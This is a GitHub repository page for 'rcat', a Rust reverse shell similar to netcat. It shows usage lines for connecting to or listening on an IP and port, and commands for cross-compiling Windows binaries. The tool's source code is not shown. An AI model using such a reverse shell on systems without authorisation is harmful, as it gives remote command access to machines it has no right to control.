Skip to content

xct/rcat

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

rcat

Simple rust reverse shell, similar to nc.

usage

rcat.exe connect <ip> <port>
rcat.exe listen <ip> <port>
rcat_ip_port.exe

compile

sudo apt update && sudo apt install mingw-w64
rustup target add x86_64-pc-windows-gnu
rustup toolchain install stable-x86_64-pc-windows-gnu

Windows:

cargo build --release --target x86_64-pc-windows-gnu

Linux:

cargo build --release

To reduce the filesize further, you can strip the binaries with strip.

Releases

No releases published

Packages

No packages published

Languages